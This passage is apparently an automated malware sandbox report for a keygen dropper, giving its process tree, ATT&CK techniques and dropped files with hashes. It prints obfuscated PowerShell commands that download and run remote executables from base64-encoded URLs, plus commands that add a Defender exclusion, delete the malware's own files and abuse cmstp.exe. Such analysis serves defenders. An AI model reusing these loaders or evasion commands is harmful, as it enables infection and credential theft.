                      PID:1360
                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                        "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                        10⤵
                        • Executes dropped EXE
                        PID:1820
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks processor information in registry
                    PID:2148
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /pid 2148 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\228798328848967\\* & exit
                      9⤵
                        PID:1900
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /pid 2148
                          10⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:788
                • C:\Users\Public\yfh.exe
                  "C:\Users\Public\yfh.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2040
                • C:\Users\Public\yfh.exe
                  "C:\Users\Public\yfh.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:112
                • C:\Users\Public\yfh.exe
                  "C:\Users\Public\yfh.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2260
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\535E.tmp\b1.hta"
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious use of WriteProcessMemory
            PID:1988
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2028
          • C:\Windows\SysWOW64\timeout.exe
            timeout 2
            3⤵
            • Delays execution with timeout.exe
            PID:592
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\535E.tmp\ba.hta"
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious use of WriteProcessMemory
            PID:284
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
              4⤵
              • Blocklisted process makes network request
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2008
              • C:\Users\Public\cte.exe
                "C:\Users\Public\cte.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2392
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of SetWindowsHookEx
                  PID:2612
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks processor information in registry
                    PID:2868
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /pid 2868 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\064473040845671\\* & exit
                      8⤵
                        PID:2788
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /pid 2868
                          9⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2792
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of SetWindowsHookEx
                    PID:2648
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                      7⤵
                      • Executes dropped EXE
                      PID:2892
                  • C:\Users\Public\cte.exe
                    "C:\Users\Public\cte.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Drops desktop.ini file(s)
                    • Modifies system certificate store
                    PID:2748
                    • C:\Users\Admin\AppData\Local\Temp\lqgqlef1Cs.exe
                      "C:\Users\Admin\AppData\Local\Temp\lqgqlef1Cs.exe"
                      7⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2180
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                        "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\lqgqlef1Cs.exe"'
                        8⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2108
                    • C:\Users\Admin\AppData\Local\Temp\LMeN9Ax7Jj.exe
                      "C:\Users\Admin\AppData\Local\Temp\LMeN9Ax7Jj.exe"
                      7⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      PID:2756
                      • C:\Windows\SysWOW64\Notepad.exe
                        "C:\Windows\System32\Notepad.exe"
                        8⤵
                          PID:1492
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c C:\Users\Public\Natso.bat
                            9⤵
                              PID:632
                              • C:\Windows\SysWOW64\reg.exe
                                reg delete hkcu\Environment /v windir /f
                                10⤵
                                • Modifies registry key
                                PID:1360
                          • C:\Program Files (x86)\internet explorer\ieinstal.exe
                            "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                            8⤵
                              PID:1956
                          • C:\Users\Admin\AppData\Local\Temp\uWJx0bZyEB.exe
                            "C:\Users\Admin\AppData\Local\Temp\uWJx0bZyEB.exe"
                            7⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of SetWindowsHookEx
                            PID:2712
                            • \??\c:\windows\SysWOW64\cmstp.exe
                              "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\t1qqjivc.inf
                              8⤵
                                PID:2956
                            • C:\Users\Admin\AppData\Local\Temp\oAxH8mFB6P.exe
                              "C:\Users\Admin\AppData\Local\Temp\oAxH8mFB6P.exe"
                              7⤵
                              • Executes dropped EXE
                              • Windows security modification
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3008
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "powershell" Get-MpPreference -verbose
                                8⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2392
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\cte.exe"
                              7⤵
                                PID:2720
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /T 10 /NOBREAK
                                  8⤵
                                  • Delays execution with timeout.exe
                                  PID:3028
                      • C:\Windows\SysWOW64\mshta.exe
                        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\535E.tmp\ba1.hta"
                        3⤵
                        • Modifies Internet Explorer settings
                        PID:1776
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                          4⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:632

                  Network

                  MITRE ATT&CK Matrix ATT&CK v6

                  Persistence

                  Modify Existing Service

                  1
                  T1031

                  Registry Run Keys / Startup Folder

                  1
                  T1060

                  Defense Evasion

                  Modify Registry

                  6
                  T1112

                  Disabling Security Tools

                  2
                  T1089

                  Install Root Certificate

                  1
                  T1130

                  Credential Access

                  Credentials in Files

                  3
                  T1081

                  Discovery

                  Query Registry

                  2
                  T1012

                  System Information Discovery

                  2
                  T1082

                  Collection

                  Data from Local System

                  3
                  T1005

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\ProgramData\MSVCP140.dll
                  • C:\ProgramData\VCRUNTIME140.dll
                  • C:\ProgramData\freebl3.dll
                  • C:\ProgramData\freebl3.dll
                  • C:\ProgramData\mozglue.dll
                  • C:\ProgramData\mozglue.dll
                  • C:\ProgramData\msvcp140.dll
                  • C:\ProgramData\nss3.dll
                    MD5

                    bfac4e3c5908856ba17d41edcd455a51

                    SHA1

                    8eec7e888767aa9e4cca8ff246eb2aacb9170428

                    SHA256

                    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                    SHA512

                    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                  • C:\ProgramData\nss3.dll
                    MD5

                    bfac4e3c5908856ba17d41edcd455a51

                    SHA1

                    8eec7e888767aa9e4cca8ff246eb2aacb9170428

                    SHA256

                    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                    SHA512

                    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                  • C:\ProgramData\softokn3.dll
                  • C:\ProgramData\softokn3.dll
                  • C:\ProgramData\sqlite3.dll
                  • C:\ProgramData\sqlite3.dll
                  • C:\ProgramData\vcruntime140.dll
                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_186814e1-16d2-4ace-8157-ba5ddf7f8d9e
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_231c2208-0720-4eec-b9f1-8bba11abd9fa
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_43c0be8f-fa09-40e7-b13e-76c4411e8e25
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_53d626a6-de6d-4779-8815-1f8a17c350f6
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_57c6647c-75fc-47bb-8ce4-3b8f0921c533
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_63778bf5-5687-412c-a72e-710c35708ab3
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d5fa298-996f-4fc9-9c01-b2226cbdaeba
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7d6878ec-2a8b-418c-8f2b-b6fcd4b50cf8
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_de4eedb8-4762-4c56-b80c-203df3aa6fa8
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e43ce3f6-b60d-4b70-bed1-86e53bf07360
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fabbb9cf-9b8c-4b2f-b33d-0de7a9a3a10e
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Temp\535E.tmp\Keygen.exe
                  • C:\Users\Admin\AppData\Local\Temp\535E.tmp\Keygen.exe
                  • C:\Users\Admin\AppData\Local\Temp\535E.tmp\b.hta
                  • C:\Users\Admin\AppData\Local\Temp\535E.tmp\b1.hta
                  • C:\Users\Admin\AppData\Local\Temp\535E.tmp\ba.hta
                  • C:\Users\Admin\AppData\Local\Temp\535E.tmp\ba1.hta
                  • C:\Users\Admin\AppData\Local\Temp\535E.tmp\m.hta
                  • C:\Users\Admin\AppData\Local\Temp\535E.tmp\m1.hta
                  • C:\Users\Admin\AppData\Local\Temp\535E.tmp\start.bat
                  • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • C:\Users\Admin\AppData\Local\Temp\LMeN9Ax7Jj.exe
                    MD5

                    013db621a3351e3fb049efd2ccad79ff

                    SHA1

                    a23394ea54dbc5342a77938a2c285ee616185560

                    SHA256

                    df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                    SHA512

                    1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                  • C:\Users\Admin\AppData\Local\Temp\LMeN9Ax7Jj.exe
                    MD5

                    4ad13f41231b6f69b068591c1a491a72

                    SHA1

                    46b3b5884a50388ce7be63712435c629ecfacdab

                    SHA256

                    7d0ebb2830861cdf36d8ebcbff7caf9bfd5fd059b519cc677ff28afc945adf84

                    SHA512

                    0ff889f2e9ec04ca6201c3ee69b70a52bbe429f592e9d09df9604a0782f25d73c780a4e27d4d65eeee3a5488fe07b7c658cc9f210c4b07e2e93a0df05c1cedb9

                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  • C:\Users\Admin\AppData\Local\Temp\lqgqlef1Cs.exe
                  • C:\Users\Admin\AppData\Local\Temp\lqgqlef1Cs.exe
                  • C:\Users\Admin\AppData\Local\Temp\oAxH8mFB6P.exe
                  • C:\Users\Admin\AppData\Local\Temp\oAxH8mFB6P.exe
                  • C:\Users\Admin\AppData\Local\Temp\uWJx0bZyEB.exe
                  • C:\Users\Admin\AppData\Local\Temp\uWJx0bZyEB.exe
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                  • C:\Users\Public\Natso.bat
                  • C:\Users\Public\cte.exe
                  • C:\Users\Public\cte.exe
                  • C:\Users\Public\cte.exe
                  • C:\Users\Public\xlv.exe
                  • C:\Users\Public\xlv.exe
                  • C:\Users\Public\xlv.exe
                  • C:\Users\Public\yfh.exe
                  • C:\Users\Public\yfh.exe
                  • C:\Users\Public\yfh.exe
                  • C:\Users\Public\yfh.exe
                  • C:\Users\Public\yfh.exe
                  • C:\Windows\temp\t1qqjivc.inf
                  • \??\PIPE\srvsvc
                  • \??\PIPE\srvsvc
                  • \ProgramData\mozglue.dll
                  • \ProgramData\mozglue.dll
                  • \ProgramData\mozglue.dll
                  • \ProgramData\msvcp140.dll
                  • \ProgramData\msvcp140.dll
                  • \ProgramData\msvcp140.dll
                  • \ProgramData\nss3.dll
                    MD5

                    bfac4e3c5908856ba17d41edcd455a51

                    SHA1

                    8eec7e888767aa9e4cca8ff246eb2aacb9170428

                    SHA256

                    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                    SHA512

                    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                  • \ProgramData\nss3.dll
                    MD5

                    bfac4e3c5908856ba17d41edcd455a51

                    SHA1

                    8eec7e888767aa9e4cca8ff246eb2aacb9170428

                    SHA256

                    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                    SHA512

                    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                  • \ProgramData\nss3.dll
                    MD5

                    bfac4e3c5908856ba17d41edcd455a51

                    SHA1

                    8eec7e888767aa9e4cca8ff246eb2aacb9170428

                    SHA256

                    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                    SHA512

                    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                  • \ProgramData\sqlite3.dll
                  • \ProgramData\sqlite3.dll
                  • \ProgramData\sqlite3.dll
                  • \ProgramData\vcruntime140.dll
                  • \ProgramData\vcruntime140.dll
                  • \ProgramData\vcruntime140.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                    MD5

                    02cc7b8ee30056d5912de54f1bdfc219

                    SHA1

                    a6923da95705fb81e368ae48f93d28522ef552fb

                    SHA256

                    1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                    SHA512

                    0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
                  • \Users\Admin\AppData\LocalLow\sqlite3.dll
                  • \Users\Admin\AppData\Local\Temp\535E.tmp\Keygen.exe
                  • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • \Users\Admin\AppData\Local\Temp\LMeN9Ax7Jj.exe
                    MD5

                    013db621a3351e3fb049efd2ccad79ff

                    SHA1

                    a23394ea54dbc5342a77938a2c285ee616185560

                    SHA256

                    df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                    SHA512

                    1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                  • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
                  • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
                  • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  • \Users\Admin\AppData\Local\Temp\lqgqlef1Cs.exe
                  • \Users\Admin\AppData\Local\Temp\oAxH8mFB6P.exe
                  • \Users\Admin\AppData\Local\Temp\uWJx0bZyEB.exe
                  • \Users\Public\cte.exe
                  • \Users\Public\cte.exe
                  • \Users\Public\xlv.exe
                  • \Users\Public\xlv.exe
                  • \Users\Public\yfh.exe
                  • memory/284-25-0x0000000000000000-mapping.dmp
                  • memory/368-242-0x0000000000510000-0x0000000000511000-memory.dmp
                    Filesize

                    4KB

                  • memory/368-238-0x0000000001100000-0x0000000001101000-memory.dmp
                    Filesize

                    4KB

